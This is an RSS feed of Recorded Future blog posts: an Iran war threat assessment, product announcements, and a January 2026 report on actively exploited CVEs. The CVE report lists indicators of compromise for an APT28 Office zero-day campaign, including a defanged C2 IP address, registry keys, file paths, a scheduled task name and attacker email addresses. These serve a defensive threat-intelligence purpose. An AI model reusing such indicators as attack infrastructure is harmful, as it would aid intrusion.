<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom">
    <channel>
        <title>Recorded Future</title>
        <link>https://www.recordedfuture.com</link>
        <description>Strengthen Your Defenses with Threat Intelligence</description>
        <lastBuildDate>Mon, 09 Mar 2026 22:30:15 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>Recorded Future, Inc.</generator>
        <language>en</language>
        <copyright>Copyright © 2026 Recorded Future, Inc.</copyright>
        <atom:link href="https://www.recordedfuture.com/feed" rel="self" type="application/rss+xml"/>
        <item>
            <title><![CDATA[The Iran War: What You Need to Know]]></title>
            <link>https://www.recordedfuture.com/blog/the-iran-war-what-you-need-to-know</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/the-iran-war-what-you-need-to-know</guid>
            <pubDate>Mon, 09 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Insikt Group tracks the cyber, physical, and geopolitical components of the US-Israeli strikes on Iran — with continuously updated threat analysis and scenarios.]]></description>
            <content:encoded><![CDATA[
        <p><em>Last updated on 9 March 2026 at 2230 GMT.</em></p>
        <p>Recorded Future's Insikt Group® is actively monitoring the rapidly evolving situation following coordinated US-Israeli strikes against Iran, the death of Supreme Leader Ali Khamenei and the widening regional war. This analysis serves as a continuously updated compilation on the geopolitical, cyber and influence operation aspects of the war, including key indicators to watch in the coming days, weeks and months.</p>
        <p>This report will be of greatest interest to organizations in the US, Israel, and Gulf states concerned about targeting by Iranian state-sponsored or state-aligned threat actors, as well as those with exposure to energy markets, maritime shipping, and critical infrastructure potentially impacted by regional escalation.</p>
        <h2>The Latest Areas to Watch</h2>
        <p>Three things to watch right now:</p>
        <ul>
          <li><strong>Mojtaba Khamenei's first address to the nation.</strong> This is the single most important near-term signal. Whether his tone is defiant, pragmatic, or obliquely conciliatory will reveal whether any room for negotiation exists — and substantially change the picture for regional stability.</li>
          <li><strong>The Internet blackout lifting and the cyber re-operationalization window.</strong> When connectivity is restored, expect scanning, brute forcing, password spraying, and probing against previously untargeted networks as early signals of Iranian cyber forces returning to operational tempo.</li>
          <li><strong>Three scenarios remain in play</strong> — and are not mutually exclusive. A swift US military exit, a negotiated Venezuela-style deal, or internal revolution and fragmentation each carry distinct risk profiles.</li>
        </ul>
        <h3>Iran's Leadership Situation</h3>
        <p>Mojtaba Khamenei, son of the late Ali Khamenei, has been elected as Supreme Leader. His election is expected to preserve hardliner continuity and underscores the IRGC's political power — they were able to shape the outcome in favor of their preferred candidate despite reported objections from some clerics. Mojtaba himself appears to have been wounded in US-Israeli strikes that killed his father, mother, wife, and one son.</p>
        <p>What this means strategically: Mojtaba is neither a credible Islamic scholar nor an experienced administrator — the two traditional prerequisites for the position. He lacks the authority his father spent two decades consolidating. For now, Iran is effectively being run by committee. Key power brokers include IRGC chief Vahidi, parliamentary speaker Ghalibaf, and overall security head Larijani. These individuals are realists, even if labeled hardliners, and have a broader range of options before them than Khamenei Senior ever permitted.</p>
        <p>There is also visible tension between political leadership and the IRGC. President Pezeshkian's public apology over the weekend for strikes on Iran's neighbors drew immediate backlash from hardliners and military leaders — a reflection of the weakness of the elected government, not a sign of internal fracturing. The IRGC is driving wartime strategy.</p>
        <p>Iran faces two paths: pursue a deal with the US that normalizes economic engagement and offers a path to regime survival — or endure the bombing, crack down domestically, export enough oil to China and India to sustain the patronage system, and wait for the geopolitical environment to shift. Mojtaba's first address to the nation will be the most significant near-term signal of which direction Iran is leaning.</p>
        <h2>Cyber Threat Landscape</h2>
        <p>Insikt Group continues to observe a near-term reduction in Iran's more advanced cyber activity since March 1. The Internet blackout across much of Iran has likely impeded operational tempo and coordination among state-sponsored groups. However, treat this period as a window in which Iran-aligned operators are regrouping, prioritizing recovery and defense, and setting conditions for future operations — not as a sign of diminished threat.</p>
        <p>It is worth separating espionage-grade operations from the broader pro-Iran ecosystem. Some groups have gone quiet; others remain active. Critically, not all groups need to operate from within Iran's borders.</p>
        <p>Recent confirmed activity:</p>
        <ul>
          <li>A pro-Iranian cyberattack was launched against Jordanian public silos and supply infrastructure around <a href="https://ukragroconsult.com/en/news/jordan-thwarts-iranian-cyberattack-on-national-wheat-silos/">March 1</a></li>
          <li>A malicious Android application mimicking a missile warning system was disseminated to Israeli civilians via <a href="https://www.scworld.com/brief/trojanized-israeli-rocket-warning-app-spread-in-cyberespionage-campaign">SMS</a> — currently under investigation and validation by Insikt Group</li>
          <li>These are considered outliers in what is likely to become a far more robust retaliation once Iran emerges from the Internet blackout</li>
        </ul>
        <h3>Groups to Track</h3>
        <p>State-sponsored: Insikt Group is actively monitoring Green Bravo (APT42), Green Golf, Cotton Sandstorm, and Cyber Avengers. These groups are capable of advanced network and vulnerability scanning, opportunistic exploitation of known vulnerabilities, deployment of disruptive and destructive malware, and satellite or television broadcast hijacks — the latter particularly likely given their psychological impact.</p>
        <p>Hacktivist fronts: The Handala Hack Team and the Conquerors Electronic Army operate in a hybrid space blending hacktivism, cyber intrusions, and influence operations. Typical TTPs include web defacements, DDoS targeting government and critical infrastructure, hack-and-leak operations, and doxing of officials and political figures. These groups are likely to be the first to resume traditional operational tempo as the blackout lifts.</p>
        <p>Also watch: Peach Sandstorm, APT34, MuddyWater, and Moses Staff each have established patterns for initial access and lateral movement. Watch for new hacktivist fronts emerging — this is typically a signal of where Iran is directing its efforts, as seen with Homeland Justice in Albania and Moses Staff targeting Israel.</p>
        <p><strong>Three Areas to Monitor</strong></p>
        <p><em>Intent to Recalibrate.</em> After this round of hostilities, cyber operations will likely expand to include new regional targets, mirroring what we've seen on the kinetic front. Iranian cyber groups will likely be active across new targeted networks and operationalized for disruptive use.</p>
        <p><em>Proliferation.</em> In line with that recalibration, Iranian cyber groups will likely be tasked to acquire and deploy more disruptive capabilities.</p>
        <p><em>Time.</em> Iran is currently experiencing a digital blackout, and cyber operations are likely impacted as a result. There are already reports suggesting aerial bombardments have hit at least one facility used by a major group. If cyber centers remain intact, Iran will still require time to re-operationalize — and if more physical centers have been targeted, that timeline extends further. For historical context: after the Qasem Soleimani killing in January 2020, Iran took approximately two months before launching what became multi-year, highly targeted campaigns against Israeli government, private sector, and academic institutions.</p>
        <p><strong>Targeted Industries</strong></p>
        <p>Critical infrastructure, government, defense, and the defense industrial base will be at the top of the targeting list. US critical infrastructure is absolutely part of that target set — Iranian APT groups are known to be opportunistic, acquiring exploits and collaborating with ransomware groups to gain network access, and the threshold for retaliation following Khamenei's death will be very high. Pro-Iran hacktivist groups — including Handala Hack Team, Cyber Islamic Resistance, RipperSec, APT IRAN, and Cyber Fattah — have announced coordinated cyber operations against Israeli and regional targets. While large-scale independently verified intrusions had not been confirmed as of March 9, organizations should not mistake this for low risk.</p>
        <p>Watch for each major group's distinct TTPs: Peach Sandstorm, APT34, MuddyWater, Cotton Sandstorm, and APT42 each have established patterns for initial access and lateral movement. Also watch for new hacktivist fronts emerging — this is typically a signal of where Iran is directing its efforts, as seen previously with Homeland Justice in Albania and Moses Staff targeting Israel.</p>
        <p><strong>What to Watch</strong></p>
        <p>When the digital blackout lifts, look for scanning, brute forcing, password spraying, and probing against your networks as early signals of Iranian cyber forces re-operationalizing. A temporal overlap between the blackout lifting and increased probing against previously untargeted networks would be a significant indicator. DDoS campaigns may also be an early signal. Ensure all public-facing technologies are patched — you can't control geopolitics, but you can control your exposure.</p>
        <p>Additionally, watch for infrastructure repurposing: groups known for traditional espionage may suddenly shift to IO-driven domains, as seen after June 2025 when espionage infrastructure pivoted to hybrid theft-and-influence operations.</p>
        <div>
          <div>
            <div>
              <h2>Expert Assessment: What Happens Next</h2>
              <p><em>Based on analysis from Dr. Christopher Ahlberg’s conversation with former MI6 Director Sir Alex Younger.</em></p>
              <p>Three scenarios are in play — not mutually exclusive, and each with distinct implications for organizations managing risk.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>Scenario 1 — Bomb, Declare Victory, and Leave</h3>
              <p>The US achieves air supremacy, conducts a sustained campaign of precision strikes against remaining target banks, forces the Strait of Hormuz open using naval power, and exits. The suppressive effect on Iranian will and capacity — particularly once B-52s can operate over Iran with impunity — should not be underestimated. This scenario has a faster resolution timeline but risks leaving unresolved instability.</p>
              <p>Resilience question: What is the operational and financial impact of a 30- to 60-day Strait closure across our critical dependencies?</p>
            </div>
          </div>
          <div>
            <div>
              <h3>Scenario 2 — A “Venezuela-Style” Deal</h3>
              <p>This is assessed as the scenario Trump is most actively angling for. Iran's new leadership — cornered economically, facing military degradation, and aware that 80% of government revenue derives from hydrocarbons now at risk — has strong incentives to negotiate. Pezeshkian's public apology, the IRGC's repudiation of it, and Trump's calls for unconditional surrender may be the opening moves of a negotiation rather than signs of irreconcilable positions. Any deal would almost certainly require zero enrichment and the transfer of Iran's 400-plus kilograms of highly enriched uranium.</p>
              <p>Resilience question: If a deal emerges within weeks, how does your organization's risk posture need to shift — and are your stakeholders prepared for rapid de-escalation as well as escalation?</p>
            </div>
          </div>
          <div>
            <div>
              <h3>Scenario 3 — Revolution or Fragmentation</h3>
              <p>Revolutions always appear unthinkable before they happen and inevitable afterward. No obvious opposition leader has emerged, but fragmentation doesn't always begin at the center. Given Iran's profound ethnic diversity, insurgencies could take hold in the periphery. This is the highest-uncertainty, highest-consequence scenario. The street-level infrastructure for suppressing domestic unrest remains stubbornly intact — but the Iranian population knows this regime ordered mass killings of unarmed protesters, and something is permanently broken in that relationship.</p>
              <p>Resilience question: Are we prepared for high-impact, low-probability incidents such as sudden infrastructure disruption, terrorist violence, or regional fragmentation affecting operations across Iraq, the Gulf, and beyond?</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1639b94af082849a6929a572441c5012d6e2eb22d.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Latin America's Cybersecurity Turning Point: From Reactive Defense to Threat Intelligence]]></title>
            <link>https://www.recordedfuture.com/blog/latin-america-cybersecurity-turning-point</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/latin-america-cybersecurity-turning-point</guid>
            <pubDate>Tue, 03 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Latin America's threat landscape is evolving fast — and reactive defense is no longer enough. PIX fraud, ransomware, and targeted attacks are outpacing overstretched security teams. Recorded Future provides LATAM-specific intelligence, automation, and seamless integrations to help your team get ahead of threats before they hit.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Latin America faces a distinct and evolving cyber threat landscape, from PIX payment fraud to ransomware hitting critical infrastructure.</li>
          <li>Most LATAM security teams are still reactive by necessity, and that posture is costing organizations in downtime, data, and trust.</li>
          <li>Recorded Future offers LATAM-specific threat intelligence, automation, and 100+ integrations to help stretched teams get ahead of attacks before they land.</li>
          <li>Meet us at RSA Booth N-6090 to see how intelligence-led security can transform your team's posture, from response to prevention.</li>
          <li>Join our upcoming webinar to learn what proactive intelligence looks like for your region.</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_17ffeff1c5b7cfe37313bfcf34dda6673c3c7026d.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Recorded Future Expands Coverage of Scams and Financial Fraud with Money Mule Intelligence from CYBERA]]></title>
            <link>https://www.recordedfuture.com/blog/recorded-future-money-mule-intelligence-cybera</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/recorded-future-money-mule-intelligence-cybera</guid>
            <pubDate>Thu, 26 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future is expanding its payment fraud prevention capabilities through a partnership with CYBERA, the industry leader in detecting and verifying data on scam-linked bank accounts.]]></description>
            <content:encoded><![CDATA[
        <p>Recorded Future is expanding its payment fraud prevention capabilities through a partnership with <a href="https://www.cybera.io/company/contact">CYBERA</a>, the industry leader in detecting and verifying data on scam-linked bank accounts.</p>
        <p>Available for purchase now via the Recorded Future Platform, Money Mule Intelligence helps fraud teams identify the accounts criminals use to extract and move stolen funds—addressing a critical gap as scams increasingly become banks' most pressing fraud challenge.</p>
        <h2><strong>The Growing Threat of Authorized Push Payment Fraud</strong></h2>
        <p>Authorized Push Payment (APP) fraud is accelerating. In the U.S., APP fraud losses are projected to reach nearly $15B by 2028, up from $8.3B in 2024, according to <a href="https://www.deloitte.com/us/en/insights/industry/financial-services/authorized-push-payment-fraud.html">Deloitte</a>. While traditional card fraud continues to decline, APP fraud is climbing, fueled by AI-generated deepfakes, personalized scam scripts, and instant payment systems like FedNow and Zelle that move money faster than conventional fraud controls can intercept it.</p>
        <p>Mule accounts, or money mules, are part of the critical infrastructure that makes these scams possible. They provide the bridge that converts stolen payments into untraceable cash or cryptocurrency. Without them, most APP fraud would collapse because criminals cannot risk receiving funds directly into their own accounts. By the time victims realize they've been scammed, mule accounts have already moved the money through multiple layers, typically ending in cash withdrawals or crypto conversions.</p>
        <p>Additionally, the sophistication of mule operations is increasing. Criminal organizations now employ "mule herders" who manage hundreds of accounts at once, using AI to simulate normal transaction behavior (grocery purchases, streaming subscriptions, etc.) so accounts don't appear dormant or suspicious. This makes detection through traditional pattern analysis increasingly difficult.</p>
        <p>Regulators are responding by shifting liability to banks, often viewing those allowing mule accounts to operate as part of the criminal infrastructure itself. For example, the UK now requires banks to reimburse scam victims and allows them to delay suspicious payments for investigation, while U.S. regulators are signaling that banks may be held liable for failing to detect mule accounts.</p>
        <p>Detecting mule accounts is fundamentally difficult. They’re designed to blend in with legitimate activity, and traditional fraud controls can struggle to distinguish between a genuine customer payment and a scam transfer until it's too late.</p>
        <h2><strong>CYBERA's Approach to Mule Intelligence</strong></h2>
        <p>The challenge of detecting and disrupting mule account networks is what led CYBERA's founders to build their solution. Coming from legal practice and law enforcement, CYBERA's leadership team worked scam cases where they witnessed how recovery becomes impossible once funds move through the financial system. They realized that money mule networks represent a central vulnerability in the scam economy, one that banks had limited visibility into.</p>
        <p>Today, CYBERA helps banks and payment networks disrupt scams at the point where funds are extracted. CYBERA's AI-powered Scam Engagement System generates intelligence on bank accounts and payment endpoints actively used by scam networks.</p>
        <p>Unlike probabilistic risk scoring, CYBERA verifies each account, providing evidence and contextual metadata to enable proactive prevention across both internal accounts and outbound payments while minimizing false positives.</p>
        <p>CYBERA supports two core use cases:</p>
        <ul>
          <li><strong>On-Us Mule Detection</strong>, which helps identify mule accounts held at your institution that are already linked to confirmed scam activity. This enables early detection and disruption of high-risk accounts, reducing downstream fraud, repeat victimization, and regulatory exposure within a bank’s accountholders.</li>
          <li><strong>Off-Us Screening</strong>, which screens outbound payments to external beneficiary accounts before execution, helping to prevent customers from sending funds to scammer-controlled accounts. This is particularly valuable for high-value transfers, social engineering attacks, and customer-initiated payments where traditional controls are limited.</li>
        </ul>
        <p>Large financial institutions have already prevented multiple six-figure losses by embedding CYBERA’s intelligence into their transaction monitoring workflows. CYBERA has also been accepted as a member of the Mastercard Start Path program, making it the first Recorded Future partner to achieve this distinction and further validating its role in the payments ecosystem.</p>
        <h2><strong>How Money Mule Intelligence Expands Payment Fraud Intelligence</strong></h2>
        <p><a href="https://www.recordedfuture.com/products/payment-fraud-intelligence">Payment Fraud Intelligence</a> (PFI) correlates the widest set of disparate, pre-monetization indicators of fraud to help teams act before their customers are impacted. Money Mule Intelligence extends that capability, giving fraud teams the verified intelligence needed to make high-confidence decisions that disrupt scams by flagging accounts that have been confirmed as mule infrastructure through direct investigation. Together, they provide coverage from initial compromise through attempted cash-out, helping fraud teams prevent losses at multiple intervention points.</p>
        <div>
          <div>
            <div>“Securing payments requires more than reacting to fraud — it requires anticipating it. Integrating Money Mule Intelligence strengthens our ability to illuminate the infrastructure behind financial crime, which is fully aligned with our strategy of securing payments with intelligence.”</div>
          </div>
          <div>
            <div>
              <p><strong>Jamie Zajac</strong></p>
              <p>Chief Product Officer at Recorded Future</p>
            </div>
          </div>
        </div>
        <p>As regulators increasingly expect banks to prevent scam-enabled transfers, Money Mule Intelligence provides the verified data needed to comply with emerging reimbursement requirements while reducing the operational burden of post-incident investigation and remediation.</p>
        <p>PFI users that purchase this capability can now act on both sides of the transaction—compromised payment instruments and scam-linked receiving accounts—with evidence-backed intelligence that minimizes false positives and aligns with the industry's shift toward proactive fraud prevention.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1f90928a17759f89a1ada2a65299215200ab27b00.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day]]></title>
            <link>https://www.recordedfuture.com/blog/january-2026-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/january-2026-cve-landscape</guid>
            <pubDate>Tue, 24 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[January 2026 saw 23 actively exploited CVEs, including APT28’s Microsoft Office zero-day and critical auth bypass flaws impacting enterprise systems.]]></description>
            <content:encoded><![CDATA[
        <p>January 2026 saw a modest 5% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 23 vulnerabilities requiring immediate remediation, up from 22 in December 2025. Noteworthy trends last month included Russian state-sponsored exploitation of a Microsoft Office zero-day and critical authentication bypass flaws affecting enterprise infrastructure.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>APT28's Operation Neusploit:</strong> Russian state-sponsored actors exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files, delivering MiniDoor, PixyNetLoader, and Covenant Grunt implants</li>
          <li><strong>Microsoft and SmarterTools lead concerns:</strong> These vendors accounted for 30% of January's vulnerabilities, with multiple critical authentication bypass and RCE flaws</li>
          <li><strong>Public exploits proliferate:</strong> Fourteen of the 23 vulnerabilities reported have public proof-of-concept exploit code available</li>
          <li><strong>Code Injection dominates:</strong> CWE-94 (Code Injection) was the most common weakness type, followed by CWE-288 (Authentication Bypass Using an Alternate Path or Channel) and CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)</li>
        </ul>
        <p><strong>Bottom line:</strong> The slight increase masks significant threats. APT28's zero-day exploitation and multiple critical authentication bypass flaws demonstrate that threat actors continue targeting enterprise communication and management platforms for initial access and persistence.</p>
        <h2>Quick Reference Table</h2>
        <p><em>All 23 vulnerabilities below were actively exploited in January 2026.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20029">CVE-2026-20029</a></div>
            <div>99</div>
            <div>Cisco Identity Services Engine Software</div>
            <div>CWE-611 (Improper Restriction of XML External Entity Reference)</div>
            <div>No</div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20805">CVE-2026-20805</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)</div>
            <div><a href="https://github.com/search?q=CVE-2026-20805&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>3</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20931">CVE-2026-20931</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-73 (External Control of File Name or Path)</div>
            <div>No</div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-23550">CVE-2026-23550</a></div>
            <div>99</div>
            <div>Modular DS Plugin</div>
            <div>CWE-266 (Incorrect Privilege Assignment)</div>
            <div><a href="https://github.com/search?q=CVE-2026-23550&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-24061">CVE-2026-24061</a></div>
            <div>99</div>
            <div>GNU InetUtils</div>
            <div>CWE-88 (Argument Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-24061&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20045">CVE-2026-20045</a></div>
            <div>99</div>
            <div>Cisco Unified Communications Manager</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-20045&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-23760">CVE-2026-23760</a></div>
            <div>99</div>
            <div>SmarterTools SmarterMail</div>
            <div>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</div>
            <div><a href="https://github.com/search?q=CVE-2026-23760&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-24423">CVE-2026-24423</a></div>
            <div>99</div>
            <div>SmarterTools SmarterMail</div>
            <div>CWE-306 (Missing Authentication for Critical Function)</div>
            <div><a href="https://github.com/search?q=CVE-2026-24423&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-21509">CVE-2026-21509</a></div>
            <div>99</div>
            <div>Microsoft Office</div>
            <div>CWE-807 (Reliance on Untrusted Inputs in a Security Decision)</div>
            <div><a href="https://github.com/search?q=CVE-2026-21509&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-24858">CVE-2026-24858</a></div>
            <div>99</div>
            <div>Fortinet Multiple Products</div>
            <div>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</div>
            <div><a href="https://github.com/search?q=CVE-2026-24858&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>11</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-40551">CVE-2025-40551</a></div>
            <div>99</div>
            <div>SolarWinds Web Help Desk</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div>No</div>
          </div>
          <div>
            <div>12</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-1281">CVE-2026-1281</a></div>
            <div>99</div>
            <div>Ivanti Endpoint Manager Mobile (EPMM)</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-1281&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>13</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-1340">CVE-2026-1340</a></div>
            <div>99</div>
            <div>Ivanti Endpoint Manager Mobile (EPMM)</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-1340&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>14</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2018-14634">CVE-2018-14634</a></div>
            <div>99</div>
            <div>Linux Kernel</div>
            <div>CWE-190 (Integer Overflow or Wraparound)</div>
            <div><a href="https://github.com/search?q=CVE-2018-14634&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>15</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-52691">CVE-2025-52691</a></div>
            <div>99</div>
            <div>SmarterTools SmarterMail</div>
            <div>CWE-434 (Unrestricted Upload of File with Dangerous Type)</div>
            <div><a href="https://github.com/search?q=CVE-2025-52691&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>16</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2024-37079">CVE-2024-37079</a></div>
            <div>99</div>
            <div>Broadcom VMware vCenter Server</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div>No</div>
          </div>
          <div>
            <div>17</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-68645">CVE-2025-68645</a></div>
            <div>99</div>
            <div>Synacor Zimbra Collaboration Suite (ZCS)</div>
            <div>CWE-98 (PHP Remote File Inclusion)</div>
            <div><a href="https://github.com/search?q=CVE-2025-68645&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>18</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-34026">CVE-2025-34026</a></div>
            <div>99</div>
            <div>Versa Concerto</div>
            <div>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</div>
            <div>No</div>
          </div>
          <div>
            <div>19</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-31125">CVE-2025-31125</a></div>
            <div>99</div>
            <div>Vite Vitejs</div>
            <div>CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), CWE-284 (Improper Access Control)</div>
            <div><a href="https://github.com/search?q=CVE-2025-31125&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>20</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-54313">CVE-2025-54313</a></div>
            <div>99</div>
            <div>Prettier eslint-config-prettier</div>
            <div>CWE-506 (Embedded Malicious Code)</div>
            <div>No</div>
          </div>
          <div>
            <div>21</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-8110">CVE-2025-8110</a></div>
            <div>89</div>
            <div>Gogs</div>
            <div>CWE-22 (Path Traversal)</div>
            <div><a href="https://github.com/search?q=CVE-2025-8110&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>22</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2009-0556">CVE-2009-0556</a></div>
            <div>89</div>
            <div>Microsoft Office</div>
            <div>CWE-94 (Code Injection)</div>
            <div>No</div>
          </div>
          <div>
            <div>23</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-37164">CVE-2025-37164</a></div>
            <div>89</div>
            <div>Hewlett Packard Enterprise OneView</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-37164&amp;type=repositories">Yes</a></div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in January based on Recorded Future data (Source: Recorded Future)</em></p>
        <h2>Key Trends in January 2026</h2>
        <h3>Affected Vendors</h3>
        <ul>
          <li><strong>Microsoft</strong> faced four critical vulnerabilities across Windows and Office products, including APT28's zero-day exploitation of CVE-2026-21509</li>
          <li><strong>SmarterTools</strong> accounted for three critical vulnerabilities affecting SmarterMail, all enabling authentication bypass or RCE</li>
          <li><strong>Cisco</strong> saw two critical flaws in Identity Services Engine and Unified Communications Manager</li>
          <li><strong>Ivanti</strong> dealt with two pre-authentication RCE vulnerabilities in Endpoint Manager Mobile</li>
          <li>Additional affected vendors/projects: Fortinet, SolarWinds, Broadcom, Synacor, Versa, Hewlett Packard Enterprise, GNU, Linux, Vite, Prettier, Gogs, and Modular DS</li>
        </ul>
        <h3>Most Common Weakness Types</h3>
        <ul>
          <li><strong>CWE-94</strong> – Code Injection</li>
          <li><strong>CWE-288</strong> – Authentication Bypass Using an Alternate Path or Channel</li>
          <li><strong>CWE-200</strong> – Exposure of Sensitive Information to an Unauthorized Actor</li>
        </ul>
        <h3>Threat Actor Activity</h3>
        <p><strong>APT28's Operation Neusploit marked January's most sophisticated campaign:</strong></p>
        <ul>
          <li>Exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files</li>
          <li>Deployed MiniDoor, a malicious Outlook VBA project designed to collect and forward victim emails to hardcoded addresses</li>
          <li>Deployed PixyNetLoader, which staged additional components and culminated in a Covenant Grunt implant</li>
          <li>Abused Filen API as a C2 bridge between the implant and actor-controlled Covenant listener</li>
        </ul>
        <h2>Priority Alert: Active Exploitation</h2>
        <p>These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.</p>
        <h3>CVE-2026-21509 | Microsoft Office</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | Active exploitation by APT28</p>
        <p><strong>Why this matters:</strong> Zero-day exploitation by Russian state-sponsored actors bypasses Office security features, enabling delivery of email collection implants and backdoors. The vulnerability stems from reliance on untrusted inputs in security decisions, allowing unauthorized attackers to bypass OLE mitigations.</p>
        <p><strong>Affected versions:</strong> Microsoft 365 and Microsoft Office (versions not specified in advisory)</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Install Microsoft's out-of-band update released January 26, 2026</li>
          <li>Search email systems for RTF attachments with embedded malicious droppers</li>
          <li>Check for modifications to %appdata%\Microsoft\Outlook\VbaProject.OTM</li>
          <li>Review registry keys: HKCU\Software\Microsoft\Office\16.0\Outlook\Security\Level, Software\Microsoft\Office\16.0\Outlook\Options\General\PONT_STRING, and Software\Microsoft\Office\16.0\Outlook\LoadMacroProviderOnBoot</li>
          <li>Monitor for connections to 213[.]155[.]157[.]123:443 and remote connectivity to Microsoft Office CDN endpoints</li>
          <li>Hunt for a scheduled task named "OneDriveHealth" and for the file %programdata%\Microsoft\OneDrive\setup\Cache\SplashScreen.png</li>
          <li>Block email addresses: ahmeclaw2002@outlook[.]com and ahmeclaw@proton[.]me</li>
        </ul>
